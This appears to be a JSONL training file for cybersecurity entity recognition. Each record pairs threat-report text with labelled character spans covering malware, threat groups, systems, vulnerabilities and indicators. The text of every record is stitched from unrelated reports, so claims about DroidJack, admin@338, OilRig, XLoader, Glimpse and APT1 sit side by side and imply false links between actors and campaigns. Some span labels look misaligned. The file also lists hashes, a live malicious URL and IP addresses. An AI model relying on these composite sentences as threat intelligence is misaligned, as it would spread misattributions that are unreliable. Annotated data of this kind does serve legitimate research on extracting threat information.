{"text": "Super Mario Run Malware # 2 \u2013 DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 30, "end": 43, "label": "Malware"}, {"start": 56, "end": 61, "label": "System"}, {"start": 66, "end": 73, "label": "System"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 139, "end": 152, "label": "Organization"}, {"start": 165, "end": 202, "label": "Organization"}, {"start": 221, "end": 244, "label": "System"}, {"start": 253, "end": 263, "label": "System"}, {"start": 279, "end": 299, "label": "System"}, {"start": 514, "end": 523, "label": "Organization"}]} {"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details . 
As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 44, "end": 51, "label": "Malware"}, {"start": 81, "end": 96, "label": "System"}, {"start": 106, "end": 113, "label": "System"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 158, "end": 173, "label": "Organization"}, {"start": 200, "end": 233, "label": "Organization"}, {"start": 259, "end": 280, "label": "Organization"}, {"start": 550, "end": 575, "label": "System"}, {"start": 581, "end": 594, "label": "System"}]} {"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) . Multiple China-based cyber threat groups have targeted international media organizations in the past . Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel . 
Indicators can be automatically sent to your security tools , like secure email gateway and firewalls , to respond and block threats in realtime .", "spans": [{"start": 56, "end": 71, "label": "System"}, {"start": 72, "end": 79, "label": "System"}, {"start": 125, "end": 138, "label": "Malware"}, {"start": 187, "end": 206, "label": "Organization"}, {"start": 221, "end": 254, "label": "Organization"}, {"start": 342, "end": 384, "label": "Organization"}, {"start": 387, "end": 394, "label": "Organization"}, {"start": 405, "end": 411, "label": "Organization"}, {"start": 472, "end": 477, "label": "System"}, {"start": 490, "end": 511, "label": "Organization"}, {"start": 557, "end": 567, "label": "Indicator"}, {"start": 602, "end": 616, "label": "System"}, {"start": 624, "end": 644, "label": "System"}, {"start": 649, "end": 658, "label": "System"}]} {"text": "Proofpoint wrote about the DroidJack RAT side-loaded with the Pokemon GO app back in July 2016 ; the difference here is that there is no game included in the malicious package . The admin@338 has targeted international media organizations in the past . Ironically , Ben-Gurion University is home to Israel \u2019s Cyber Security Research Center . So , if you get a bunch of messages from strangers , do n't click on the links , and do n\u2019t click on any attachments .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 40, "label": "Malware"}, {"start": 62, "end": 72, "label": "System"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 205, "end": 238, "label": "Organization"}, {"start": 266, "end": 287, "label": "Organization"}, {"start": 299, "end": 339, "label": "Organization"}, {"start": 354, "end": 392, "label": "Indicator"}]} {"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users . 
In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Investigators put the origin of the attack as Iranian ; Morphisec \u2019s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": [{"start": 59, "end": 74, "label": "System"}, {"start": 106, "end": 113, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 211, "end": 230, "label": "Organization"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 465, "end": 471, "label": "Malware"}]} {"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent . 
For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 17, "end": 32, "label": "System"}, {"start": 48, "end": 68, "label": "Indicator"}, {"start": 75, "end": 107, "label": "Indicator"}, {"start": 168, "end": 183, "label": "System"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 310, "end": 319, "label": "Malware"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 517, "end": 532, "label": "Organization"}, {"start": 551, "end": 565, "label": "System"}, {"start": 600, "end": 608, "label": "Vulnerability"}, {"start": 626, "end": 630, "label": "System"}, {"start": 633, "end": 646, "label": "Vulnerability"}, {"start": 693, "end": 701, "label": "Malware"}, {"start": 702, "end": 708, "label": "Malware"}, {"start": 844, "end": 854, "label": "System"}]} {"text": "Once installed , the RAT registers the infected device as shown below . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . Microsoft released the patch for the vulnerability on April 11 , but many organizations have not yet deployed the update . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": [{"start": 93, "end": 102, "label": "Organization"}, {"start": 161, "end": 180, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}]} {"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . 
The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 147, "end": 181, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}]} {"text": "Observe below the code routine for call recording . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 61, "end": 76, "label": "System"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 153, "end": 163, "label": "Malware"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 373, "end": 394, "label": "Organization"}, {"start": 399, "end": 422, "label": "Organization"}, {"start": 507, "end": 593, "label": "Vulnerability"}, {"start": 663, "end": 671, "label": "Organization"}]} {"text": "This RAT records all the calls and stores the recording to an \u201c .amr \u201d file . We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command . For security purposes , Morphisec is not revealing these names . 
We have seen this algorithm deployed by other groups before , either as a standalone encryption algorithm or as part of a more custom approach .", "spans": [{"start": 64, "end": 68, "label": "Indicator"}, {"start": 94, "end": 103, "label": "Organization"}, {"start": 145, "end": 155, "label": "System"}, {"start": 172, "end": 202, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 343, "end": 382, "label": "Malware"}, {"start": 392, "end": 435, "label": "Malware"}, {"start": 439, "end": 472, "label": "Malware"}]} {"text": "The following is the code routine for video capturing . We have previously observed the admin@338 group use BUBBLEWRAP . Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm . In late 2022 , Mandiant responded to a disruptive cyber physical incident in which the Russia - linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization .", "spans": [{"start": 88, "end": 103, "label": "Organization"}, {"start": 108, "end": 118, "label": "System"}, {"start": 166, "end": 174, "label": "Malware"}, {"start": 234, "end": 240, "label": "Malware"}, {"start": 367, "end": 374, "label": "Organization"}, {"start": 377, "end": 395, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 427, "end": 435, "label": "Organization"}, {"start": 451, "end": 485, "label": "Organization"}, {"start": 528, "end": 536, "label": "Organization"}, {"start": 548, "end": 594, "label": "Organization"}]} {"text": "Here , the RAT stores all the captured videos in a \u201c video.3gp \u201d file . 
The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government . The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 53, "end": 62, "label": "Indicator"}, {"start": 76, "end": 83, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 124, "end": 143, "label": "Malware"}, {"start": 178, "end": 188, "label": "System"}, {"start": 476, "end": 494, "label": "Organization"}, {"start": 564, "end": 573, "label": "System"}]} {"text": "It also harvests call details and SMS logs as shown below . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky . UNC2452 is a sophisticated group that has targeted government and private sector entities worldwide .", "spans": [{"start": 64, "end": 73, "label": "Organization"}, {"start": 157, "end": 168, "label": "Organization"}, {"start": 326, "end": 346, "label": "System"}, {"start": 363, "end": 383, "label": "Organization"}, {"start": 428, "end": 436, "label": "Organization"}, {"start": 439, "end": 446, "label": "Organization"}, {"start": 490, "end": 500, "label": "Organization"}, {"start": 505, "end": 538, "label": "Organization"}]} {"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too . 
An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . Name SHA256 . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model \u2014 a move that could skyrocket the impact of attacks .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 89, "end": 97, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 307, "end": 313, "label": "Organization"}, {"start": 378, "end": 388, "label": "Malware"}]} {"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab . We mentioned Akamai 's blog but it was also documented by Recorded Future .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 234, "end": 255, "label": "System"}, {"start": 264, "end": 274, "label": "System"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}, {"start": 357, "end": 363, "label": "Indicator"}, {"start": 366, "end": 430, "label": "Indicator"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 491, "end": 506, "label": "Organization"}]} {"text": "The following are the DBs created and maintained by the RAT . 
The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 184, "end": 205, "label": "System"}, {"start": 214, "end": 224, "label": "System"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 265, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}, {"start": 307, "end": 314, "label": "Indicator"}, {"start": 324, "end": 388, "label": "Indicator"}, {"start": 391, "end": 414, "label": "Organization"}, {"start": 522, "end": 531, "label": "Vulnerability"}]} {"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . 
Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": [{"start": 91, "end": 104, "label": "Malware"}, {"start": 233, "end": 242, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}, {"start": 359, "end": 374, "label": "Organization"}, {"start": 377, "end": 382, "label": "Indicator"}, {"start": 385, "end": 449, "label": "Indicator"}, {"start": 452, "end": 460, "label": "Organization"}]} {"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 153, "end": 162, "label": "Organization"}, {"start": 209, "end": 222, "label": "Organization"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 251, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 297, "end": 302, "label": "Indicator"}, {"start": 305, "end": 369, "label": "Indicator"}, {"start": 385, "end": 401, "label": "Vulnerability"}, {"start": 476, "end": 492, "label": "Vulnerability"}]} {"text": "As a reminder , it is always a good practice to download apps only from trusted app stores such as Google Play . In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations . 
The most notable difference from last year \u2019s OilRig campaign is the way the attack was delivered . During the investigation , Mandiant observed the threat actor target four ( 4 ) OSX Ventura systems running either versions 13.3 or 13.4.1 .", "spans": [{"start": 99, "end": 110, "label": "System"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 181, "end": 195, "label": "System"}, {"start": 262, "end": 268, "label": "Malware"}, {"start": 396, "end": 415, "label": "Organization"}, {"start": 431, "end": 454, "label": "Organization"}]} {"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable . However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": [{"start": 146, "end": 155, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}, {"start": 364, "end": 369, "label": "System"}, {"start": 374, "end": 378, "label": "System"}, {"start": 508, "end": 518, "label": "Organization"}]} {"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . Name Delivery Server . 
COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 21, "end": 28, "label": "System"}, {"start": 40, "end": 47, "label": "Malware"}, {"start": 63, "end": 70, "label": "Malware"}, {"start": 107, "end": 114, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 168, "end": 174, "label": "System"}, {"start": 179, "end": 183, "label": "System"}, {"start": 214, "end": 219, "label": "Organization"}, {"start": 294, "end": 304, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 383, "end": 395, "label": "Malware"}, {"start": 421, "end": 443, "label": "Malware"}]} {"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test4.hta http://comonscar.in ( 82.145.40.46 ) . PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": [{"start": 79, "end": 86, "label": "Malware"}, {"start": 96, "end": 104, "label": "System"}, {"start": 107, "end": 113, "label": "System"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 304, "end": 336, "label": "Vulnerability"}, {"start": 387, "end": 394, "label": "System"}, {"start": 397, "end": 406, "label": "Indicator"}, {"start": 407, "end": 426, "label": "Indicator"}, {"start": 429, "end": 441, "label": "Indicator"}, {"start": 446, "end": 452, "label": "System"}]} {"text": "Trend Micro researchers found a new variant that uses a different way to lure users . 
According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test5.hta 80.82.67.42 . Would you click on the links in the email , even if it came from an address you did nt recognize If you have old vacation pictures on Facebook , a determined hacker could use them to write such an email , and cyber criminals are starting to use that kind of information to craft targets specifically for their victims .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 99, "end": 106, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 190, "end": 222, "label": "Vulnerability"}, {"start": 273, "end": 280, "label": "System"}, {"start": 283, "end": 292, "label": "Indicator"}, {"start": 293, "end": 304, "label": "Indicator"}, {"start": 516, "end": 531, "label": "Organization"}]} {"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP . test1.hta reserved . By selecting these links , you will be leaving NIST webspace .", "spans": [{"start": 9, "end": 16, "label": "Malware"}, {"start": 53, "end": 60, "label": "System"}, {"start": 92, "end": 95, "label": "System"}, {"start": 114, "end": 120, "label": "System"}, {"start": 125, "end": 129, "label": "System"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 234, "end": 244, "label": "System"}, {"start": 247, "end": 256, "label": "Indicator"}, {"start": 315, "end": 319, "label": "Organization"}]} {"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions . 
Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 . The IP range for \u201c PIG GOD \u201d is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 \u2019s pet pig .", "spans": [{"start": 188, "end": 201, "label": "Organization"}, {"start": 222, "end": 241, "label": "Organization"}, {"start": 326, "end": 390, "label": "Indicator"}, {"start": 393, "end": 444, "label": "Indicator"}, {"start": 536, "end": 543, "label": "Indicator"}]} {"text": "This newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . Name SHA256 . \" The server was used to distribute and infect victims with an upgraded version of Rising Sun with SSL capabilities , \" informs a report shared with BleepingComputer .", "spans": [{"start": 37, "end": 44, "label": "Malware"}, {"start": 71, "end": 93, "label": "Indicator"}, {"start": 239, "end": 248, "label": "Organization"}, {"start": 269, "end": 288, "label": "Organization"}, {"start": 528, "end": 544, "label": "System"}]} {"text": "Infection chain The threat actors behind this version used several fake websites as their host \u2014 copying that of a Japanese mobile phone operator \u2019 s website in particular \u2014 to trick users into downloading the fake security Android application package ( APK ) . 
This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . 0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 224, "end": 231, "label": "System"}, {"start": 287, "end": 294, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}, {"start": 351, "end": 360, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}, {"start": 439, "end": 459, "label": "Organization"}, {"start": 495, "end": 510, "label": "Organization"}, {"start": 521, "end": 529, "label": "Indicator"}, {"start": 530, "end": 594, "label": "Indicator"}]} {"text": "Monitoring efforts on this new variant revealed that the malicious websites are spread through smishing . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . 1.vbs BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED . 
None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 137, "end": 151, "label": "System"}, {"start": 156, "end": 177, "label": "System"}, {"start": 209, "end": 229, "label": "Organization"}, {"start": 232, "end": 237, "label": "Indicator"}, {"start": 238, "end": 302, "label": "Indicator"}, {"start": 442, "end": 455, "label": "Vulnerability"}]} {"text": "The infection has not spread very widely at the time of writing , but we \u2019 ve seen that many users have already received its SMS content . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . A Glimpse into Glimpse For the second blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig S-APT/APT34 . 
Instead , it \u2019s likely that Royal is simply testing a new encryptor \u2014 especially considering that BlackSuit was used in just two attacks last month \u2014 and that this lull can be explained as more or less of a research period for them .", "spans": [{"start": 143, "end": 152, "label": "Organization"}, {"start": 170, "end": 184, "label": "System"}, {"start": 189, "end": 210, "label": "System"}, {"start": 242, "end": 262, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 332, "end": 360, "label": "Organization"}, {"start": 374, "end": 381, "label": "Malware"}, {"start": 409, "end": 419, "label": "System"}, {"start": 449, "end": 467, "label": "Organization"}, {"start": 498, "end": 503, "label": "Malware"}, {"start": 524, "end": 537, "label": "System"}, {"start": 568, "end": 577, "label": "Malware"}]} {"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper . Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands . If this is a potential threat vector for the organization , dual controls need to be put in place .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 103, "end": 106, "label": "System"}, {"start": 117, "end": 124, "label": "Organization"}, {"start": 149, "end": 164, "label": "Organization"}, {"start": 206, "end": 216, "label": "System"}, {"start": 316, "end": 319, "label": "Indicator"}, {"start": 362, "end": 372, "label": "Malware"}]} {"text": "This new wave also presents unique attack vectors based on the kind of device it has accessed . 
The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March . Glimpse : 6e86c57385d26a59c0df1580454b9967 . In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 168, "end": 177, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 254, "end": 261, "label": "Malware"}, {"start": 264, "end": 296, "label": "Indicator"}, {"start": 360, "end": 364, "label": "Organization"}, {"start": 397, "end": 407, "label": "Vulnerability"}]} {"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors . Glimpse is a PowerShell script that is executed silently by Visual Basic . The victims in this campaign a government in Asia and a telecommunications company in the Middle East do align with the kinds of victims we often see Budworm targeting .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 254, "end": 273, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 289, "end": 299, "label": "System"}, {"start": 336, "end": 348, "label": "System"}, {"start": 371, "end": 379, "label": "Organization"}, {"start": 380, "end": 400, "label": "Organization"}, {"start": 405, "end": 452, "label": "Organization"}, {"start": 501, "end": 508, "label": "Organization"}]} {"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings . 
FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic and trade policy . Based on the code, it is unclear what initiates the Visual Basic script . On April 21 , 2022 , KillNet also stated that \" REVIL is back in the ranks . \"", "spans": [{"start": 166, "end": 173, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 288, "end": 325, "label": "Organization"}, {"start": 380, "end": 392, "label": "System"}, {"start": 423, "end": 430, "label": "Organization"}]} {"text": "If users allow such apps to be installed , then it can be actively installed on the victim \u2019 s device . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai . However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 157, "end": 161, "label": "Organization"}, {"start": 315, "end": 338, "label": "Organization"}, {"start": 446, "end": 455, "label": "Vulnerability"}]} {"text": "The infection chain is slightly more roundabout in the case of Apple devices . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are . After Glimpse starts, it checks for the existence of a directory and lock . 
Ego", "spans": [{"start": 63, "end": 68, "label": "System"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 184, "end": 188, "label": "Organization"}, {"start": 265, "end": 272, "label": "Malware"}]} {"text": "Accessing the same malicious site would redirect its user to another malicious website ( hxxp : //apple-icloud [ . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . If no directory or lock file is found, Glimpse creates . While a top attack vector for Cuba is the exploitation of known vulnerabilities , the actors techniques also include phishing campaigns , compromised credentials , and remote desktop protocol exploits .", "spans": [{"start": 89, "end": 114, "label": "Indicator"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 151, "end": 158, "label": "System"}, {"start": 257, "end": 264, "label": "Malware"}]} {"text": "] qwq-japan [ . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT . Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is . The script contained instructions to download and execute a second stage payload .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 54, "end": 82, "label": "System"}, {"start": 91, "end": 101, "label": "System"}, {"start": 106, "end": 115, "label": "System"}, {"start": 247, "end": 254, "label": "Malware"}, {"start": 267, "end": 347, "label": "Malware"}]} {"text": "] com or hxxp : //apple-icloud [ . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 . After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without . 
Apropos of my retrospective report , Bullock found that a great many messages in Biderman \u2019s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": [{"start": 9, "end": 34, "label": "Indicator"}, {"start": 84, "end": 98, "label": "Organization"}, {"start": 118, "end": 132, "label": "Organization"}, {"start": 136, "end": 140, "label": "Organization"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 331, "end": 335, "label": "System"}, {"start": 383, "end": 390, "label": "Organization"}, {"start": 503, "end": 526, "label": "Organization"}, {"start": 533, "end": 558, "label": "Organization"}]} {"text": "] zqo-japan [ . APT1 were a highly prolific cyber-attack group operating out of China . The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping ) . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": [{"start": 16, "end": 20, "label": "Organization"}, {"start": 44, "end": 62, "label": "Organization"}, {"start": 112, "end": 119, "label": "Malware"}, {"start": 131, "end": 134, "label": "Indicator"}]} {"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load . APT1 is a China-based cyber-espionage group , active since mid-2006 . In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket . 
